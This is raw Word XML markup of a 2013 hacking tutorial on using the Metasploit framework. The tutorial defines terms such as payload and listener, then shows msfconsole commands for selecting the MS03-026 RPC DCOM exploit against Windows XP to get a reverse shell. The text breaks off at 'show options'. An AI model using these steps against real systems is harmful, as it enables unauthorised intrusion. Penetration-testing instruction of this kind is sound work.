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BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="264" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="63"/>
          <w:szCs w:val="63"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>How to Exploit and Gain Remote Access to PCs Running Windows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="53"/>
          <w:szCs w:val="53"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="225"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BY </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00264BEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="888888"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>OCCUPYTHEWEB</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="225"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> 10/04/2013 7:27 PM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="6" w:space="3" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:ind w:left="225"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00264BEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial Narrow" w:eastAsia="Times New Roman" w:hAnsi="Arial Narrow" w:cs="Times New Roman"/>
            <w:color w:val="888888"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>LISTENERS</w:t>
        </w:r>
      </w:hyperlink>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In my </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00264BEF">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="1888E1"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>first installment</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this series on professional hacking tools, we downloaded and installed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the exploitation framework. Now, we will begin to explore the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Framework and initiate a tried and true hack.</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Before we start hacking, let's familiarize ourselves with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so that when I use certain terms, we all understand them to mean the same thing. When first looking at the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Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we'll try to make it understandable so that we can execute our first exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="120" w:line="336" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Terminology</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The following terminology is not only used within the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Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Exploit</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Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you've probably already heard of are SQL injections, buffer overflows, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Payload</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A payload is the program or code that is delivered to the victim system.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has pre-built payloads for this purpose included in the highly useful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="495"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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This is a set of instructions used as a payload when the exploitation occurs. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically written in assembly language, but not necessarily always. It's called "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>" because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="495"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Module</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A module is a piece of software that can be used by the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Framework. These modules are interchangeable and give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its unique power. These modules might be exploit modules or auxiliary modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="495"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Listener</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This is that component that listens for the connection from the hacker's system to the target system. The listener simply handles the connection between these systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="495"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Show</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Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.</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Now that we have the basics of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concepts and commands down, let's hack a system!</w:t>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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Getting Started</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First, open a terminal in Linux.</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One of the most reliable hacks is on the ubiquitous Windows XP system with the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00264BEF">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="1888E1"/>
            <w:spacing w:val="2"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>RPC DCOM</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. It's a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft's comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="https://img.wonderhowto.com/img/82/90/63470438534010/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.w145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2/90/63470438534010/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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162300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Open the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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console.</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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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Be patient, it takes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>awhile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> for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to load all of its modules. The current version of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has 823 exploits and 250 payloads.</w:t>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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Find the Exploit</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allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>dcom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="https://img.wonderhowto.com/img/78/12/63470437823616/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.w145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8/12/63470437823616/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Set the Exploit</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Now let's tell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what exploit we want to use. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> and the name of our exploit, exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dcerpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/ms03_026_dcom.</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>dcerpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/ms03_026_dcom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00264BEF" w:rsidRPr="00264BEF" w:rsidRDefault="00264BEF" w:rsidP="00264BEF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>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noProof/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5638800" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="https://img.wonderhowto.com/img/43/62/63470437854910/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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43/62/63470437854910/0/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp.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Note that the prompt has changed and now reflects our chosen exploit.</w:t>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lastRenderedPageBreak/>
        <w:t>Step 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Set the Options</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Now that we've chosen our exploit, we can ask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what our options are. By typing show options,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will list our options in executing this exploit.</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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00264BEF">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; show options</w:t>
      </w:r>
    </w:p>
